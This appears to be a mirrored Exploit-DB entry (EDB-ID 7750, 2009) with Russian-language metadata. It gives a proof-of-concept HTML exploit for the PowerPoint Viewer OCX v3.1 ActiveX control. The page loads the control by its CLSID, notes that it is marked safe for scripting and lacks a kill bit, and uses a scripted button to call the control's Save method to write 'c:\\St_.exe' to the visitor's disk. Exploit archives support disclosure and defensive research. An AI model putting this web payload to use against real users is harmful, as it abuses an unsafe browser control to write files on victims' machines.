- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7750
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-01-13
HTML:
<HTML>
---------------------------------------------------------- <br>
PowerPoint Viewer OCX v3.1 <br>
---------------------------------------------------------- <br>
-----------------------------------<br>
# By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class OA
GUID: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
Number of Interfaces: 1
Default Interface: _DOA
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data -->
<title>PowerPoint Viewer OCX v3.1 </title>
<BODY>
<object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\\St_.exe"
Stack.Save(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>
# milw0rm.com [2009-01-13]
- Источник
- www.exploit-db.com